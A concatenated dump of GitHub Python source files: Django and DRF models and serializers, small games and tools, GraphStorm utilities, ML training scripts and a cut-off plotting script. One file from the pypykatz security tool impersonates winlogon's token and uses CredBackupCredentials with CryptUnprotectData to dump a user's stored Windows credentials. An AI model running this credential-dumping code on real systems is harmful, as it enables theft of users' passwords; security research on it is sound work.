'app_label.ModelName'\n\n def __str__(self):\n return self.title\n\n class Meta:\n ordering = [\"-created\"]\n verbose_name = \"Project\"\n verbose_name_plural = \"Lean Projects\"\n\n def tags_list(self):\n return utils.from_qs_to_list(self.tags.all())\n\n @property\n def feedback(self):\n if self.vote_ratio >= 50:\n return self.POSITIVE\n return self.NEGATIVE\n\n def pluralize(self):\n if self.votes > 1:\n return self.VOTES\n return self.VOTE\n\n\nclass Review(UUIDMixin, TimestampMixin, models.Model):\n # owner\n\n proj = models.ForeignKey(\n Project,\n on_delete=models.CASCADE,\n related_name=\"reviews\",\n verbose_name=_(\"Project\"),\n )\n # on_delete ==> what you will do with children if parent deleted ?\n body = models.TextField(null=True, blank=True, verbose_name=_(\"Body\"))\n value = models.CharField(\n max_length=256,\n choices=VoteType.choices,\n verbose_name=_(\"Value\"),\n default=VoteType.UP,\n )\n\n def __str__(self):\n return self.body[:30]\n\n def project(self):\n return self.proj\n\n def content(self):\n if self.body:\n return self.body[:30]\n return \"-\"\n\n\nclass Tag(UUIDMixin, TimestampMixin, models.Model):\n name = models.CharField(max_length=256, verbose_name=_(\"Name\"))\n\n def __str__(self):\n return self.name\n\n def projects_list(self):\n return utils.from_qs_to_list(self.projects.all())\n","repo_name":"NagahShinawy/devsearch","sub_path":"apps/projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30297915167","text":"from bs4 import BeautifulSoup\nfrom colorama import init, Fore, Back, Style\n\ndef hex_to_bash_color(hex_color:str):\n \"\"\"Converts hex color to bash color\n \"\"\"\n hex_color = hex_color.replace(\"#\", \"\")\n r, g, b = tuple(int(hex_color[i:i+2], 16) for i in (0, 2, 4))\n return f\"\\033[38;2;{r};{g};{b}m\"\n\n# initialize colorama\ninit()\n\n# Open ascii file with html version of the image\nascii = open(\"ascii.html\")\nasciitxt = ascii.read()\nascii.close()\n\n# Analyze text from the ascii\nsoup = BeautifulSoup(asciitxt, 'html.parser')\nelements = soup.find_all([\"span\", \"br\"])\n\n# Initialize variables used in the loop\ntext = \"\" # Output text\nmaxline_length = 0 # Max line length (in content) in the ascii art\nlinelen = 0 # Line length, auxisliary variable\nsium = False\nfor element in elements:\n if element.name == \"span\":\n span = element\n try:\n # Get the color from the element\n color = span[\"style\"].split(':')[1]\n text += hex_to_bash_color(color.replace(\"#\", \"\")) # Convert the color to bash color and append it to the text\n text += span.text # Write span content and append it to text\n linelen += len(span.text) # Increase line length\n if linelen > maxline_length: # Update maxline_length variable\n maxline_length = linelen\n except Exception as e:\n print(e)\n elif element.name == \"br\": # New line\n text += \"\\n\"\n linelen = 0 # Reset line length\nprint(text) # print result\n\nleng = 0 # Find the longest line (not content)\nfor line in text.split(\"\\n\"):\n if leng < len(line):\n leng = len(line)\n\n# Calculate and print neofetch gap\ngap = leng-maxline_length\nprint(\"To use the ascii execute the command\", \"neofetch --ascii output --gap '-{}'\".format(gap))\n\n# Save the file\nout = open(\"output\", \"w+\")\nout.write(text)\nout.close()\n\n","repo_name":"FrancescoCaracciolo/neofetch-ascii-generator-image","sub_path":"create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37859798445","text":"import pygame as pg\n\n\nclass BarreVie:\n\n def __init__(self, pokemon, x_y, ecran, longueur):\n self.ecran = ecran\n self.pokemon = pokemon\n self.longueur = longueur\n self.x_y = x_y\n self.rectangle_max = pg.Rect(x_y[0], x_y[1], self.longueur, 20)\n self.rectangle_actuel = pg.Rect(x_y[0], x_y[1], self.longueur, 20)\n self.rectangle_fond = pg.Rect(x_y[0] - 10, x_y[1] - 70, self.longueur + 20, 100)\n self.font = pg.font.SysFont(\"comicsansms\", 20)\n\n def maj(self):\n pg.draw.rect(self.ecran, (255, 255, 255), self.rectangle_fond)\n self.ecran.blit(self.font.render(self.pokemon.nom, True, (0, 0, 0)), (self.x_y[0], self.x_y[1] - 60))\n self.ecran.blit(self.font.render(f\"{self.pokemon.statVieActuel} / {self.pokemon.statVie}\", True, (0, 0, 0)), (self.x_y[0], self.x_y[1] - 35))\n pg.draw.rect(self.ecran, (255, 0, 0), self.rectangle_max)\n pg.draw.rect(self.ecran, (0, 255, 50), pg.Rect(self.x_y[0], self.x_y[1], (( self.pokemon.statVieActuel / self.pokemon.statVie) * self.longueur), 20))\n\n","repo_name":"Nitcheuu/Hackaton","sub_path":"barrevie.py","file_name":"barrevie.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41915750851","text":"def solve(money, i):\n if money < 0:\n return float(\"inf\")\n\n if memo[money][i] != None:\n return memo[money][i]\n elif i == c:\n result = money\n else:\n result = min([solve(money - g, i + 1) for g in garments[i]])\n memo[money][i] = result\n return result\n\nt = int(input())\nfor tcase in range(t):\n m, c = map(int, input().split())\n memo = [[None for i in range(c+1)] for j in range(m+1)]\n garments = []\n for _ in range(c):\n garments.append(list(map(int, input().split()))[1:])\n \n ans = solve(m, 0)\n if ans == float(\"inf\"):\n print(\"no solution\")\n else:\n print(m - ans)\n ","repo_name":"TobiPristupin/CompetitiveProgramming","sub_path":"UVa/WeddingShopping11450_TopDown.py","file_name":"WeddingShopping11450_TopDown.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22378853824","text":"\"\"\"Role request serializers.\"\"\"\n# Utils\nimport datetime\n\n# Django REST Framework\nfrom rest_framework import serializers\n\n# Models\nfrom AmbieNet.users.models import RoleRequest, User\n\n# Serializers\nfrom AmbieNet.users.serializers import UserModelSerializer\n\nclass CreateRoleRequestSerializer(serializers.ModelSerializer):\n class Meta:\n model = RoleRequest\n fields = ('new_role', 'message')\n\n def validate(self, data):\n user = User.objects.get(username = self.context['requesting_user_username'])\n user_requests = RoleRequest.objects.filter(\n requesting_user = user\n )\n\n if user_requests.exists():\n last_user_request = user_requests.last()\n past_days = datetime.date.today().day - last_user_request.created.day\n\n if past_days < 30:\n raise serializers.ValidationError('This user have been done a request in the last 30 days')\n\n return data\n\n def create(self, data):\n user = User.objects.get(username = self.context['requesting_user_username'])\n role_request = RoleRequest.objects.create(\n requesting_user = user,\n **data\n )\n\n return role_request\n\nclass RoleRequestModelSerializer(serializers.ModelSerializer):\n\n requesting_user = UserModelSerializer(read_only=True)\n class Meta:\n model = RoleRequest\n fields = ('new_role', 'message', 'requesting_user', 'status')\n\n read_only_fields = (\n 'new_role',\n 'message',\n 'requesting_user',\n 'status'\n )\n\nclass AnswerRoleRequestSerializer(serializers.Serializer):\n\n staff_username = serializers.CharField(min_length=4)\n username = serializers.CharField(min_length=6)\n request_status = serializers.CharField()\n new_role = serializers.IntegerField(required = False, allow_null = True)\n\n def validate(self, data):\n \"\"\"Handle of validate the existence of user role request.\"\"\"\n user = User.objects.get(username = data['username'])\n user_requests = RoleRequest.objects.filter(\n requesting_user = user\n )\n\n if user_requests.exists():\n if user_requests.last().status != 1:\n raise serializers.ValidationError('This request has been answered in the past')\n else:\n raise serializers.ValidationError('This user doesn`t have pending requests')\n\n self.context['user_request'] = user_requests.last()\n self.context['requesting_user'] = user\n self.context['request_status'] = data['request_status']\n self.context['new_role'] = data['new_role']\n self.context['staff_username'] = data['staff_username']\n\n return data\n\n def save(self):\n\n role_request = self.context['user_request']\n requesting_user = self.context['requesting_user']\n\n if self.context['request_status'] == 'approved':\n role_request.status = '3'\n requesting_user.role = self.context['new_role']\n\n requesting_user.save()\n else:\n role_request.status = '2'\n\n role_request.staff_validator_username = self.context['staff_username']\n role_request.save()\n\n return role_request\n","repo_name":"sansuaza/Backend-AmbieNet","sub_path":"AmbieNet/users/serializers/role_requests.py","file_name":"role_requests.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11302517786","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"easy-color\",\n version=\"0.0.1\",\n author=\"Michael Moeller\",\n author_email=\"github@mk-moeller.de.com\",\n description=\"Easy color manipulation with python\",\n url=\"https://github.com/MichiMolle/color\",\n packages=setuptools.find_packages(),\n)","repo_name":"MichiMolle/color","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36426101010","text":"# Made by Kerb\nimport sys\nfrom com.it.br.gameserver.model.quest import State\nfrom com.it.br.gameserver.model.quest import QuestState\nfrom com.it.br.gameserver.model.quest.jython import QuestJython as JQuest\nfrom com.it.br.gameserver.model.actor.instance import L2NpcInstance\nfrom com.it.br.gameserver.datatables.sql import SpawnTable\n\nqn = \"652_AnAgedExAdventurer\"\n#Npc\nTANTAN = 32012\nSARA = 30180\n\n#Items\nCSS = 1464\n\nclass Quest (JQuest) :\n\n def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)\n\n def onAdvEvent (self,event,npc,player) :\n st = player.getQuestState(qn)\n if not st: return\n htmltext = event\n if event == \"32012-02.htm\" :\n if st.getQuestItemsCount(CSS) > 99 :\n st.set(\"cond\",\"1\")\n st.setState(STARTED)\n st.playSound(\"ItemSound.quest_accept\")\n st.takeItems(CSS,100)\n htmltext = \"32012-03.htm\"\n npc.deleteMe()\n elif event == \"32012-02a.htm\" :\n st.exitQuest(1)\n st.playSound(\"ItemSound.quest_giveup\")\n return htmltext\n\n def onTalk (Self,npc,player):\n st = player.getQuestState(qn)\n htmltext = \"You are either not carrying out your quest or don't meet the criteria.\"\n if not st : return htmltext\n npcId = npc.getNpcId()\n id = st.getState()\n cond=st.getInt(\"cond\")\n if npcId == TANTAN and id == CREATED:\n if st.getPlayer().getLevel() >= 46 :\n htmltext = \"32012-01.htm\"\n else:\n htmltext = \"32012-00.htm\"\n st.exitQuest(1)\n elif npcId == SARA and st.getInt(\"cond\")==1 :\n htmltext = \"30180-01.htm\"\n EAD_CHANCE = st.getRandom(100)\n st.giveItems(57,5026)\n if EAD_CHANCE <= 50:\n st.giveItems(956,int(1*Config.RATE_QUESTS_REWARD))\n st.playSound(\"ItemSound.quest_finish\")\n st.exitQuest(1)\n return htmltext\n\nQUEST = Quest(652,qn,\"AnAgedExAdventurer\")\nCREATED = State('Start', QUEST)\nSTARTED = State('Started', QUEST)\n\nQUEST.setInitialState(CREATED)\nQUEST.addStartNpc(TANTAN)\n\nQUEST.addTalkId(TANTAN)\nQUEST.addTalkId(SARA)","repo_name":"L2jBrasil/L2jBrasil","sub_path":"L2JBrasil_DP/data/jscript/quests/652_AnAgedExAdventurer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"38110673116","text":"import os\nimport json\nimport time\nimport resource\nimport psutil\n\nimport dgl\nimport torch as th\n\ndef get_rank():\n \"\"\" Get rank of a process\n \"\"\"\n return th.distributed.get_rank()\n\ndef estimate_mem_train(root, task):\n ''' Estimate the memory consumption per machine during training.\n\n Parameters\n ----------\n root : str\n The path to the partitioned graph folder.\n task : str\n It's either an 'edge' task or a 'node' task.\n\n Returns\n -------\n a tuple of max memory size and shared memory size.\n '''\n mem_list = []\n shared_mem_list = []\n parts = []\n # Find the partition IDs from the folder.\n for f in os.listdir(root):\n if os.path.isdir(os.path.join(root, f)):\n parts.append(int(f[4:]))\n parts.sort()\n for i in parts:\n part_path = os.path.join(root, f'part{i}')\n if os.path.isdir(part_path):\n g = dgl.load_graphs(os.path.join(part_path, 'graph.dgl'))[0][0]\n num_nodes = g.number_of_nodes()\n num_edges = g.number_of_edges()\n # The memory consumption of the graph structure.\n # This includes the coo format (16), edge ID (8), inner edge (1),\n # original edge ID (8), edge type (8)\n struct_size = (num_edges * (16 + 8 + 1 + 8 + 8)\n # this includes inner node (1), node ID (8), original node ID (8),\n # node type (8)\n + num_nodes * (1 + 8 + 8 + 8)\n + (num_edges * 16 + num_nodes * 8) # This is to store the CSC format.\n ) / 1024/1024/1024\n node_feats = os.path.getsize(os.path.join(part_path, 'node_feat.dgl')) / 1024/1024/1024\n edge_feats = os.path.getsize(os.path.join(part_path, 'edge_feat.dgl')) / 1024/1024/1024\n # The memory usage when after the server runs.\n # At this point, all data are stored in the shared memory.\n shared_mem = stable_serv_mem = struct_size + node_feats + edge_feats\n # The peak memory usage\n # Here we assume that the shared memory is pre-allocated.\n # If we need to allocate regular memory, we need additional memory from the system.\n max_serv_mem = max([shared_mem + struct_size, # when loading the graph structure.\n shared_mem + node_feats, # when loading the node features.\n shared_mem + edge_feats]) # when loading the edge features.\n # The memory usage of all trainers in a machine.\n max_cli_mem = num_edges * 8 * 2 if task == 'edge' else num_nodes * 8 * 2\n # It's bit hard to estimate the trainer memory. Let's be more conservative.\n max_cli_mem *= 1.5\n max_cli_mem = max_cli_mem / 1024/1024/1024\n mem_list.append(max(max_serv_mem, stable_serv_mem + max_cli_mem))\n shared_mem_list.append(shared_mem)\n print('part{i}, N={num_nodes}, E={num_edges}, peak serv mem: {max_serv_mem:.3f} GB, '\\\n 'stable serv mem: {stable_serv_mem:.3f} GB, '\\\n 'shared mem: {shared_mem_list[-1]:.3f} GB, cli mem: {max_cli_mem:.3f} GB')\n return max(mem_list), max(shared_mem_list)\n\ndef estimate_mem_infer(root, graph_name, num_hidden, num_layers):\n ''' Estimate the memory consumption for inference.\n\n Parameters\n ----------\n root : str\n The path to the partitioned graph folder.\n graph_name : str\n The graph name.\n num_hidden : int\n The hidden size for the GNN embeddings.\n num_layers : int\n The number of GNN layers.\n\n Returns\n -------\n a tuple of max memory size and shared memory size.\n '''\n mem_list = []\n shared_mem_list = []\n parts = []\n # Find the partition IDs from the folder.\n for f in os.listdir(root):\n if os.path.isdir(os.path.join(root, f)):\n parts.append(int(f[4:]))\n with open(os.path.join(root, graph_name + '.json'), 'r', encoding='utf-8') as f:\n schema = json.load(f)\n parts.sort()\n for i in parts:\n part_path = os.path.join(root, f'part{i}')\n if os.path.isdir(part_path):\n # number of nodes in the partition.\n ntypes = list(schema['node_map'].keys())\n num_part_nodes = []\n for ntype in ntypes:\n r = schema['node_map'][ntype][i]\n num_part_nodes.append(r[1] - r[0])\n num_part_nodes = sum(num_part_nodes)\n\n g = dgl.load_graphs(os.path.join(part_path, 'graph.dgl'))[0][0]\n num_nodes = g.number_of_nodes()\n num_edges = g.number_of_edges()\n # The memory size for the graph structure. The calculation is the same as above.\n struct_size = (num_edges * (16 + 8 + 1 + 8 + 8) + num_nodes * (1 + 8 + 8 + 8)\n + (num_edges * 16 + num_nodes * 8)) / 1024/1024/1024\n # The memory size for the node features.\n node_feats = os.path.getsize(os.path.join(part_path, 'node_feat.dgl')) / 1024/1024/1024\n # The memory size for the edge features.\n edge_feats = os.path.getsize(os.path.join(part_path, 'edge_feat.dgl')) / 1024/1024/1024\n # The shared memory stores the graph structure, the node features, edge features\n # as well as the embeddings of the input layer and each GNN layer.\n shared_mem = (struct_size + node_feats + edge_feats\n + num_part_nodes * num_hidden * 4 * (num_layers + 1) / 1024/1024/1024)\n # The memory usage when after the server runs.\n # Majority data is stored in shared memory. When saving the GNN embeddings to the disk,\n # we need to extract the GNN node embeddings, which is stored\n # in the local Pytorch tensor.\n stable_serv_mem = shared_mem + num_part_nodes * num_hidden * 4 / 1024/1024/1024\n # The peak memory usage\n max_serv_mem = max([struct_size + shared_mem, shared_mem + node_feats,\n shared_mem + edge_feats, stable_serv_mem])\n # The memory usage of all trainers in a machine.\n max_cli_mem = num_nodes * 8 * 2\n # It's bit hard to estimate the trainer memory. Let's be more conservative.\n max_cli_mem *= 1.5\n max_cli_mem = max_cli_mem / 1024/1024/1024\n mem_list.append(max(max_serv_mem, stable_serv_mem + max_cli_mem))\n shared_mem_list.append(shared_mem)\n print(f'part {i}, N={num_nodes}, E={num_edges}, peak serv mem: {max_serv_mem:.3f} GB, '\\\n 'stable serv mem: {stable_serv_mem:.3f} GB, '\\\n 'shared mem: {shared_mem_list[-1]:.3f} GB, cli mem: {max_cli_mem:.3f} GB')\n return max(mem_list), max(shared_mem_list)\n\nclass SysTracker:\n \"\"\" This tracks the system performance.\n\n It tracks the runtime and memory consumption.\n \"\"\"\n def __init__(self, debug=True):\n self._checkpoints = []\n self._rank = dgl.distributed.rpc.get_rank()\n self._debug = debug\n\n # This is to create only one instance.\n _instance = None\n\n def __new__(cls, *args, **kwargs): # pylint: disable=unused-argument\n \"\"\" Only create one instance.\n \"\"\"\n if not isinstance(cls._instance, cls):\n cls._instance = object.__new__(cls)\n\n return cls._instance\n\n def check(self, name):\n \"\"\" Check the system metrics.\n \"\"\"\n mem_info = psutil.Process(os.getpid()).memory_info()\n gmem_info = psutil.virtual_memory()\n self._checkpoints.append((name, time.time(), mem_info.rss, mem_info.shared,\n resource.getrusage(resource.RUSAGE_SELF).ru_maxrss,\n gmem_info.used, gmem_info.shared))\n # We need to get the right rank\n if self._rank < 0:\n self._rank = dgl.distributed.rpc.get_rank()\n if len(self._checkpoints) >= 2 and self._debug and self._rank == 0:\n checkpoint1 = self._checkpoints[-2]\n checkpoint2 = self._checkpoints[-1]\n print(\"{}: elapsed time: {:.3f}, mem (curr: {:.3f}, peak: {:.3f}, shared: {:.3f}, \\\n global curr: {:.3f}, global shared: {:.3f}) GB\".format(\n name, checkpoint2[1] - checkpoint1[1],\n checkpoint2[2]/1024/1024/1024, checkpoint2[4]/1024/1024,\n checkpoint2[3]/1024/1024/1024, checkpoint2[5]/1024/1024/1024,\n checkpoint2[6]/1024/1024/1024))\n\nsys_tracker = SysTracker()\n","repo_name":"RubensZimbres/GNN_AWS","sub_path":"python/graphstorm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"10238891827","text":"from PyQt4.QtCore import SIGNAL, QUrl, QEvent\nfrom PyQt4.QtGui import QVBoxLayout\nfrom PyQt4.QtWebKit import QWebView, QWebPage\n\nimport re\n\nimport PluginBase\nimport streamTools\n\nHOMEURL = \"http://dir.xiph.org/\"\nTUNEIN = re.compile(r'/listen/\\d+/listen\\.(m3u|xspf)$')\n\nclass IcecastForm(PluginBase.PluginBase):\n ''' Embeds the xiph.org Icecast yellow pages, and loads the \n streams from the m3u and XSPF playlist files.\n '''\n moduleName = 'I&cecast'\n moduleIcon = \"network-workgroup\"\n\n def load(self):\n pass\n\n def event(self, event):\n if event.type() == QEvent.Paint:\n if not hasattr(self, 'webView'):\n self._load()\n self.event = super(IcecastForm, self).event\n return False\n\n def _load(self):\n self.webView = QWebView(self)\n self.webPage = self.webView.page()\n\n self.layout = QVBoxLayout(self)\n self.layout.addWidget(self.webView)\n self.webView.load(QUrl(HOMEURL))\n self.webPage.setLinkDelegationPolicy(QWebPage.DelegateExternalLinks)\n self.connect(self.webPage, SIGNAL('linkClicked(const QUrl&)'), self._processLink)\n\n def _processLink(self, url):\n urlString = unicode(url.toString())\n urlMatch = TUNEIN.search(urlString)\n if urlMatch is not None:\n self._playStation(urlString)\n else:\n self.webView.load(url)\n self.webView.show()\n\n def _playStation(self, url):\n try:\n streamList = streamTools.getStreamList(url)\n except streamTools.ParseError:\n return\n if streamList:\n self.modelManager.playQueue.extend(streamList)\n\n\ndef getWidget(modelManager, mpdclient, config, library):\n return IcecastForm(modelManager, mpdclient, config, library)\n","repo_name":"tarmack/Pythagora","sub_path":"plugins/IcecastForm.py","file_name":"IcecastForm.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"26028016369","text":"\n\n\n\nINF = 9999999999999999999\nV = 9\ndef minDistance(dist, sptSet):\n\n min = INF\n min_index = -1\n for v in range(V):\n if sptSet[v] == False and dist[v]<= min:\n min = dist[v]\n min_index = v\n return min_index\n\ndef dijkstra(graph, src):\n\n dist = [INF]* V\n sptSet = [False] * V\n dist[src] = 0\n for count in range(V-1):\n u = minDistance(dist, sptSet)\n sptSet[u] = True\n for v in range(V):\n if not sptSet[v] and graph[u][v] != 0 and dist[u] != INF:\n if dist [u] + graph[u][v] < dist[v]: #condicion de relajacion\n dist[v] = dist [u] + graph[u][v]\n\n\n return dist\n\n\ngraph = []\nfor i in range(V):\n graph.append( [0] * V)\n\nedges = [\"0 1 4\",\n \"1 2 8\",\n \"2 3 7\",\n \"3 4 9\",\n \"4 5 10\",\n \"3 5 14\",\n \"2 5 4\",\n \"2 8 2\",\n \"8 6 6\",\n \"6 5 2\",\n \"7 6 1\",\n \"7 8 7\",\n \"7 1 11\",\n \"0 7 8\"]\n\nfor edge in edges:\n data = edge.split(\" \")\n graph[int(data[0])][int(data[1])] = int(data[2])\n graph[int(data[1])][int(data[0])] = int(data[2])\nprint(dijkstra(graph, 0))","repo_name":"Lufedi/ECI-PIMO-2017-2","sub_path":"Clases/dijkstra/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20123727232","text":"# Thank you!\n# https://www.tiraniddo.dev/2021/05/dumping-stored-credentials-with.html\n\nimport tempfile\nimport os\n\nfrom pypykatz import logger\nfrom pypykatz.commons.winapi.local.function_defs.advapi32 import CredBackupCredentials\nfrom pypykatz.commons.readers.local.process import Process, PROCESS_QUERY_LIMITED_INFORMATION\nfrom pypykatz.commons.readers.local.common.privileges import enable_debug_privilege, RtlAdjustPrivilege\nfrom pypykatz.commons.winapi.local.function_defs.advapi32 import SetThreadToken\nfrom pypykatz.dpapi.functiondefs.dpapi import CryptUnprotectData\nfrom pypykatz.dpapi.structures.credentialfile import CREDENTIAL_BLOB, CredentialFile\n\n\ndef dpapi_trustedcredman(target_pid, special_process = 'winlogon.exe', temp_file_path = None):\n dec_data = None\n try:\n if temp_file_path is None:\n tf = tempfile.NamedTemporaryFile(delete=False)\n temp_file_path = tf.name \n logger.debug('Temp file path: %s' % temp_file_path)\n tf.close()\n\n enable_debug_privilege()\n\n ### opening winlogon and duplicating token, impersonating it, enabling SeTrustedCredmanAccessPrivilege\n pwinlogon = Process(name = special_process, access = PROCESS_QUERY_LIMITED_INFORMATION, open = True)\n winlogon_token = pwinlogon.duplicate_token()\n SetThreadToken(winlogon_token)\n RtlAdjustPrivilege(31, thread_or_process=True) #SeTrustedCredmanAccessPrivilege = 31\n \n \n ### opening target process, getting handle on its token\n puserprocess = Process(pid=target_pid, access = PROCESS_QUERY_LIMITED_INFORMATION, open = True)\n puserprocess_token = puserprocess.get_process_token()\n\n ### magic happens here\n CredBackupCredentials(puserprocess_token, temp_file_path)\n\n ### opening encrypted cerentials file and decrypting it\n with open(temp_file_path, 'rb') as f:\n dec_data = CryptUnprotectData(f.read())\n\n\n ### parsing decrypted credfile\n results = []\n xf = CredentialFile.from_bytes(dec_data)\n blobsdata = xf.data\n if xf.unk == 2:\n res = CREDENTIAL_BLOB.from_bytes(blobsdata)\n results.append(res)\n blobsdata = blobsdata[res.size:]\n while len(blobsdata) > 0:\n res = CREDENTIAL_BLOB.from_bytes(blobsdata)\n results.append(res)\n blobsdata = blobsdata[res.size:]\n\n return dec_data, results, None\n except Exception as e: \n logger.debug('dpapi_trustedcredman err! %s' % e)\n return dec_data, None, e\n finally:\n try:\n os.unlink(temp_file_path)\n logger.debug('Temp file removed')\n except Exception as e:\n logger.debug('Failed to remove temp file! %s' % str(e))\n pass","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/dpapi/extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"6625116196","text":"import pandas as pd\nimport pickle\n# Load the model from the file\nwith open('alert_model.pkl', 'rb') as f:\n model, scaler, thresholds = pickle.load(f)\n# Define a function to predict alerts based on the input data\ndef predict_threshold(df, columns):\n # Standardize the input data\n input_data_scaled = scaler.transform(df[columns])\n # Make predictions using the model\n predictions = model.predict(input_data_scaled)\n # Check if each prediction is above or below threshold\n alerts = []\n for i in range(len(predictions)):\n if predictions[i] == 1:\n alerts.append(f\"Row {i}: Above threshold\")\n else:\n alerts.append(f\"Row {i}: Below threshold\")\n return alerts\n# Example usage\ninput_data = pd.DataFrame({'temperature_100': [20],\n 'pressure_100': [1000],\n 'wind_speed_100': [10],\n 'power_output_100': [1500]})\n# Select the columns to use for modeling\nfeatures = ['temperature_100', 'pressure_100', 'wind_speed_100', 'power_output_100']\nalerts = predict_threshold(input_data, features)\nfor alert in alerts:\n print(alert)\n","repo_name":"bpbpublications/IoT-Data-Analytics-using-Python","sub_path":"Chapter 09/code/901_9.6.py","file_name":"901_9.6.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24974770970","text":"import os\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\nimport yaml\nfrom argparse import ArgumentParser\nfrom model.imm_model import lmm_model\nfrom data.data_util import CelabDataset,BatchTransform\nfrom train import train_model\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport copy\nfrom torch.optim import lr_scheduler\n\n\n\nparser = ArgumentParser()\nparser.add_argument(\"--config\", required=True, help=\"path to config\")\nopt = parser.parse_args()\nwith open(opt.config) as f:\n config = yaml.load(f)\n\n# Model Parameters\n\nmodel_param = config['model']\nnum_filter = model_param['n_filters']\nfinal_channel_size = model_param['final_channel_size']\ninv_std = model_param['inv_std']\nn_maps = model_param['n_maps']\nmap_sizes = model_param['map_sizes']\ngauss_mode = model_param['gauss_mode']\n\n# Data parameters\n\ndata_param = config['training']['train_dset_params']\ntrain_data_path = data_param['train_datadir']\ntrain_csv_file_path = data_param['train_datalabeldir']\ntrain_csv_filename = data_param['train_datalabelcsv']\ntrain_datatype = data_param['train_datatype']\n\nvalid_data_path = data_param['valid_datadir']\nvalid_csv_file_path = data_param['valid_datalabeldir']\nvalid_csv_filename = data_param['valid_datalabelcsv']\n\n\ntrain_celeb_ds = CelabDataset(datapath = train_data_path,\n csv_file_path = train_csv_file_path,\n csv_filename = train_csv_filename,\n data_type = train_datatype)\nvalid_celeb_ds = CelabDataset(datapath = valid_data_path,\n csv_file_path = valid_csv_file_path,\n csv_filename = valid_csv_filename,\n data_type = train_datatype)\n\nbatch = config['training']['batch']\n\n\ntrain_dl = torch.utils.data.DataLoader(train_celeb_ds,batch_size=batch, shuffle=True)\nvalid_dl = torch.utils.data.DataLoader(valid_celeb_ds,batch_size=batch, shuffle=True)\n#for image in train_dl:\n# print(image.size)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\ndsts = {\"train\": train_celeb_ds, \"val\": valid_celeb_ds}\ndataloaders = {\"train\": train_dl, \"val\": valid_dl}\n \nmodel = lmm_model(num_filter=num_filter,final_channel_size=final_channel_size,inv_std=inv_std,nmaps=n_maps,map_sizes=map_sizes,gauss_mode=gauss_mode)\nif torch.cuda.is_available():\n model.to(device)\n# Neural Net Parameters\n\nn_epoch = config['training']['n_epoch']\nlr = config['training']['lr']['start_val']\nwts_decay = config['training']['lr']['decay']\nstep_sz = config['training']['lr']['step']\n\noptimizer_ft = optim.Adam(list(filter(lambda p: p.requires_grad, model.parameters())), \n lr = lr, betas=(0.9, 0.999), eps=1e-08, weight_decay=wts_decay, amsgrad=False)\n#optimizer_ft = optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=step_sz, gamma=0.1)\nmodel_ft = train_model(model, dsts,dataloaders,optimizer_ft, exp_lr_scheduler,\n num_epochs=n_epoch,data_type = train_datatype)\n","repo_name":"stanimman/imm-model-pytorch","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38567806442","text":"import numpy as np\n\n\ndef step1(crabs):\n distance = np.inf\n for i in range(crabs.max()):\n delta = np.abs(crabs - i)\n tmp = delta.sum()\n if tmp < distance:\n distance = tmp\n return distance\n\n\ndef step2(crabs):\n distance = np.inf\n for i in range(crabs.max()):\n delta = np.abs(crabs - i)\n tmp = (delta * (delta + 1) // 2).sum()\n if tmp < distance:\n distance = tmp\n return distance\n\n\ndef main():\n with open('resources/day7') as file:\n crabs = np.array(file.readline().split(\",\"), dtype=int)\n\n print(step2(crabs))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Eagleseb/AdventOfCode2021","sub_path":"day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18775327070","text":"#!/usr/bin/env python\n\n\"\"\"\nPlot visual benchmark (average seasonal cycle) of old vs new model runs.\n\nThat's all folks.\n\"\"\"\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (18.10.2017)\"\n__email__ = \"mdekauwe@gmail.com\"\n\nimport netCDF4 as nc\nimport matplotlib.pyplot as plt\nimport sys\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.ticker import FixedLocator\nimport os\n\ndef main(amb_fname, ele_fname):\n\n df_a = read_cable_file(amb_fname)\n df_e = 